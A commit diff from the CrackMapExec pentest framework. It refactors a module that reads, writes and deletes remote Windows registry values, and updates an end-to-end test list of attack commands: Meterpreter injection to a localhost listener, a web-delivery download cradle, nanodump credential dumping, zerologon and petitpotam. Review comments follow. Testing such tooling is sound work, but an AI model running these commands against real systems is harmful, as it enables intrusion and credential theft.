tests: update tests
parent
ac563f1b91
commit
7da0b71fa8
|
@ -7,21 +7,29 @@ from impacket.examples.secretsdump import RemoteOperations
|
|||
|
||||
|
||||
class CMEModule:
|
||||
name = 'reg-query'
|
||||
description = 'Performs a registry query on the machine'
|
||||
supported_protocols = ['smb']
|
||||
opsec_safe = True
|
||||
multiple_hosts = True
|
||||
def __init__(self, context=None):
|
||||
self.delete = None
|
||||
self.type = None
|
||||
self.value = None
|
||||
self.key = None
|
||||
self.path = None
|
||||
self.name = 'reg-query'
|
||||
self.description = 'Performs a registry query on the machine'
|
||||
self.supported_protocols = ['smb']
|
||||
self.opsec_safe = True
|
||||
self.multiple_hosts = True
|
||||
self.context = context
|
||||
|
||||
def options(self, context, module_options):
|
||||
'''
|
||||
PATH: Registry key path to query
|
||||
KEY: Registry key value to retrieve
|
||||
VALUE Registry key value to set (only used for modification). Will add a new regitry key if use on registry key that does not already exist
|
||||
TYPE Type of registry to modify, add or delete. Default type : REG_SZ. Type supported : REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
||||
DELETE If set to True, delete a registry key if it does exist
|
||||
'''
|
||||
|
||||
"""
|
||||
PATH Registry key path to query
|
||||
KEY Registry key value to retrieve
|
||||
VALUE Registry key value to set (only used for modification)
|
||||
Will add a new registry key if the registry key does not already exist
|
||||
TYPE Type of registry to modify, add or delete. Default type : REG_SZ.
|
||||
Type supported: REG_NONE, REG_SZ, REG_EXPAND_SZ,REG_BINARY, REG_DWORD, REG_DWORD_BIG_ENDIAN, REG_LINK, REG_MULTI_SZ, REG_QWORD
|
||||
DELETE If set to True, delete a registry key if it does exist
|
||||
"""
|
||||
self.context = context
|
||||
self.path = None
|
||||
self.key = None
|
||||
|
@ -54,12 +62,12 @@ class CMEModule:
|
|||
try :
|
||||
self.value = int(self.value)
|
||||
except:
|
||||
context.log.error("Invalid registry value type specified: %s" % self.value)
|
||||
sys.exit(1)
|
||||
context.log.error(f"Invalid registry value type specified: {self.value}")
|
||||
return
|
||||
if self.type in type_dict:
|
||||
self.type = type_dict[self.type]
|
||||
else:
|
||||
context.log.error("Invalid registry value type specified: %s" % self.type)
|
||||
context.log.error(f"Invalid registry value type specified: {self.type}")
|
||||
return
|
||||
else:
|
||||
self.type = 1
|
||||
|
@ -68,83 +76,114 @@ class CMEModule:
|
|||
self.delete = True
|
||||
|
||||
def on_admin_login(self, context, connection):
|
||||
self.context = context
|
||||
if not self.path:
|
||||
context.log.error("Please provide the path of the registry to query")
|
||||
self.context.log.error("Please provide the path of the registry to query")
|
||||
return
|
||||
|
||||
if not self.key:
|
||||
context.log.error("Please provide the registry key to query")
|
||||
self.context.log.error("Please provide the registry key to query")
|
||||
return
|
||||
|
||||
remoteOps = RemoteOperations(connection.conn, False)
|
||||
remoteOps.enableRegistry()
|
||||
remote_ops = RemoteOperations(connection.conn, False)
|
||||
remote_ops.enableRegistry()
|
||||
|
||||
try:
|
||||
if "HKLM" in self.path or "HKEY_LOCAL_MACHINE" in self.path:
|
||||
self.path = (self.path).replace('HKLM\\', '')
|
||||
ans = rrp.hOpenLocalMachine(remoteOps._RemoteOperations__rrp)
|
||||
|
||||
self.path = self.path.replace('HKLM\\', '')
|
||||
ans = rrp.hOpenLocalMachine(remote_ops._RemoteOperations__rrp)
|
||||
elif "HKCU" in self.path or "HKEY_CURRENT_USER" in self.path:
|
||||
self.path = (self.path).replace('HKCU\\', '')
|
||||
ans = rrp.hOpenCurrentUser(remoteOps._RemoteOperations__rrp)
|
||||
|
||||
self.path = self.path.replace('HKCU\\', '')
|
||||
ans = rrp.hOpenCurrentUser(remote_ops._RemoteOperations__rrp)
|
||||
elif "HKCR" in self.path or "HKEY_CLASSES_ROOT" in self.path:
|
||||
self.path = (self.path).replace('HKCR\\', '')
|
||||
ans = rrp.hOpenClassesRoot(remoteOps._RemoteOperations__rrp)
|
||||
|
||||
self.path = self.path.replace('HKCR\\', '')
|
||||
ans = rrp.hOpenClassesRoot(remote_ops._RemoteOperations__rrp)
|
||||
else:
|
||||
context.log.error("Unsupported registry hive specified in path: %s" % self.path)
|
||||
self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
|
||||
return
|
||||
|
||||
regHandle = ans['phKey']
|
||||
ans = rrp.hBaseRegOpenKey(remoteOps._RemoteOperations__rrp, regHandle, self.path)
|
||||
keyHandle = ans['phkResult']
|
||||
reg_handle = ans['phKey']
|
||||
ans = rrp.hBaseRegOpenKey(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
reg_handle,
|
||||
self.path
|
||||
)
|
||||
key_handle = ans['phkResult']
|
||||
|
||||
if self.delete:
|
||||
# Delete registry
|
||||
try:
|
||||
# Check if value exists
|
||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
except:
|
||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
||||
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||
return
|
||||
# Delete value
|
||||
rrp.hBaseRegDeleteValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
self.context.log.success('Registry key %s has been deleted successfully' % (self.key))
|
||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
||||
rrp.hBaseRegDeleteValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
self.context.log.success(f"Registry key {self.key} has been deleted successfully")
|
||||
rrp.hBaseRegCloseKey(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle
|
||||
)
|
||||
|
||||
if self.value is not None:
|
||||
# Check if value exists
|
||||
try:
|
||||
# Check if value exists
|
||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
self.context.log.highlight("Key %s exists with value %s" % (self.key, reg_value))
|
||||
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
self.context.log.highlight(f"Key {self.key} exists with value {reg_value}")
|
||||
# Modification
|
||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
||||
context.log.success("Key %s has been modified to %s" % (self.key, self.value))
|
||||
rrp.hBaseRegSetValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key,
|
||||
self.type,
|
||||
self.value
|
||||
)
|
||||
self.context.log.success(f"Key {self.key} has been modified to {self.value}")
|
||||
except:
|
||||
rrp.hBaseRegSetValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key, self.type, self.value)
|
||||
self.context.log.success("New Key %s has been added with value %s" % (self.key, self.value))
|
||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
||||
|
||||
rrp.hBaseRegSetValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key,
|
||||
self.type,
|
||||
self.value
|
||||
)
|
||||
self.context.log.success(f"New Key {self.key} has been added with value {self.value}")
|
||||
rrp.hBaseRegCloseKey(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle
|
||||
)
|
||||
else:
|
||||
# Query
|
||||
try :
|
||||
dataType, reg_value = rrp.hBaseRegQueryValue(remoteOps._RemoteOperations__rrp, keyHandle, self.key)
|
||||
context.log.highlight("%s: %s" % (self.key, reg_value))
|
||||
try:
|
||||
data_type, reg_value = rrp.hBaseRegQueryValue(
|
||||
remote_ops._RemoteOperations__rrp,
|
||||
key_handle,
|
||||
self.key
|
||||
)
|
||||
self.context.log.highlight(f"{self.key}: {reg_value}")
|
||||
except:
|
||||
if self.delete:
|
||||
pass
|
||||
else :
|
||||
self.context.log.error("Registry key %s does not exist" % (self.key))
|
||||
else:
|
||||
self.context.log.error(f"Registry key {self.key} does not exist")
|
||||
return
|
||||
rrp.hBaseRegCloseKey(remoteOps._RemoteOperations__rrp, keyHandle)
|
||||
|
||||
rrp.hBaseRegCloseKey(remote_ops._RemoteOperations__rrp, key_handle)
|
||||
except DCERPCException as e:
|
||||
#context.log.error("DCERPC Error while querying or modifying registry: %s" % e)
|
||||
pass
|
||||
self.context.log.error(f"DCERPC Error while querying or modifying registry: {e}")
|
||||
except Exception as e:
|
||||
context.log.error("Error while querying or modifying registry: %s" % e)
|
||||
|
||||
self.context.log.error(f"Error while querying or modifying registry: {e}")
|
||||
finally:
|
||||
remoteOps.finish()
|
||||
remote_ops.finish()
|
||||
|
|
|
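Review bot: The hive check in on_admin_login matches by substring and strips only the short alias, so a path given as `HKEY_LOCAL_MACHINE\SOFTWARE\...` passes `"HKEY_LOCAL_MACHINE" in self.path` but `self.path.replace('HKLM\\', '')` leaves it untouched and hBaseRegOpenKey is handed a sub-key that still begins with the root name; HKCU and HKCR behave the same way, and `replace` would also strip an `HKLM\` found anywhere in the string rather than only at the front. Splitting the root off once with `partition` and dispatching through a table fixes both, as below; it replaces the if/elif chain between `try:` and `reg_handle = ans['phKey']`. Separately, the bare `except:` around each hBaseRegQueryValue reports any RPC failure, access denied included, as `Registry key ... does not exist`, and the delete branch's early `return` skips hBaseRegCloseKey on key_handle (remote_ops.finish() in the `finally:` presumably tears the connection down, so this is hygiene rather than a leak); `except DCERPCException as e:` with `e` in the log message would keep the error honest. The `self.opsec_safe = True` that appears to move into `__init__` is also questionable for a module that writes or deletes values whenever VALUE or DELETE is set — worth either flipping to False or noting in the docstring that modification is not a passive query.
```python
# … unchanged: path/key checks, RemoteOperations setup …
try:
    hive_openers = {
        "HKLM": rrp.hOpenLocalMachine,
        "HKEY_LOCAL_MACHINE": rrp.hOpenLocalMachine,
        "HKCU": rrp.hOpenCurrentUser,
        "HKEY_CURRENT_USER": rrp.hOpenCurrentUser,
        "HKCR": rrp.hOpenClassesRoot,
        "HKEY_CLASSES_ROOT": rrp.hOpenClassesRoot,
    }
    # Only the root (text before the first backslash) selects the hive;
    # the remainder is the sub-key handed to hBaseRegOpenKey.
    hive, _, sub_key = self.path.partition("\\")
    open_hive = hive_openers.get(hive.upper())
    if open_hive is None:
        self.context.log.error(f"Unsupported registry hive specified in path: {self.path}")
        return
    self.path = sub_key
    ans = open_hive(remote_ops._RemoteOperations__rrp)
    # … unchanged: hBaseRegOpenKey, delete / set / query branches, handlers …
```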
@ -1,3 +1,4 @@
|
|||
##### SMB
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --shares --filter-shares READ WRITE
|
||||
|
@ -20,6 +21,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -x whoami
|
|||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami --obfs
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS --wmi "os get"
|
||||
##### SMB Modules
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M bh_owned
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M dfscoerce
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M drop-sc
|
||||
|
@ -58,7 +60,7 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdcman
|
|||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp --options
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M reg-query -o PATH=HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion KEY=DevicePath
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M runasppl
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M scuffy -o SERVER=127.0.0.1 NAME=test
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M shadowcoerce
|
||||
|
@ -122,8 +124,10 @@ crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M veeam --options
|
|||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M wifi --options
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M winscp --options
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M zerologon --options
|
||||
##### SMB Anonymous Auth
|
||||
crackmapexec smb TARGET -u '' -p '' -M zerologon
|
||||
crackmapexec smb TARGET -u '' -p '' -M petitpotam
|
||||
##### LDAP
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --users
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --groups
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --get-sid
|
||||
|
@ -132,6 +136,7 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --kerberoasting /tmp/o
|
|||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --trusted-for-delegation
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --admin-count
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS --gmsa
|
||||
##### LDAP Modules
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M adcs --options
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M daclread
|
||||
|
@ -154,18 +159,27 @@ crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc
|
|||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M user-desc --options
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami
|
||||
crackmapexec ldap TARGET -u USERNAME -p PASSWORD KERBEROS -M whoami --options
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD -X whoami
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD --laps
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD
|
||||
##### WINRM
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS -X whoami
|
||||
crackmapexec winrm TARGET -u USERNAME -p PASSWORD KERBEROS --laps
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
##### MSSQL
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
##### MSSQL Modules
|
||||
# crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M empire_exec
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M met_inject --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M mssql_priv --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M nanodump --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M test_connection -o HOST=localhost
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD -M web_delivery -o URL=localhost/dl_cradle
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject -o SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M met_inject --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M mssql_priv --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M nanodump --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M test_connection -o HOST=localhost
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery --options
|
||||
crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS -M web_delivery -o URL=localhost/dl_cradle
|
||||
# a bit janky, but we try to enable RDP before testing RDP
|
||||
crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable
|
||||
##### RDP
|
||||
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS
|
||||
crackmapexec rdp TARGET -u USERNAME -p PASSWORD KERBEROS --nla-screenshot
|
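Review bot: The new RDP block enables Remote Desktop on the target with `crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=enable` and, as far as the hunk shows, the file then ends after `--nla-screenshot` with nothing turning it back off, so every e2e run leaves the lab host with RDP exposed; adding `crackmapexec smb TARGET -u USERNAME -p PASSWORD KERBEROS -M rdp -o ACTION=disable` as the last line restores the state the earlier `-M rdp -o ACTION=disable` test established. The `crackmapexec mssql TARGET -u USERNAME -p PASSWORD KERBEROS` line that sits under the `##### WINRM` heading looks like a leftover, since the same command is repeated immediately under `##### MSSQL`; dropping the first copy keeps the sections honest. The `# a bit janky` comment could also say why the step is there, e.g. `# the rdp protocol tests below need an RDP listener, so enable it first via the smb module`.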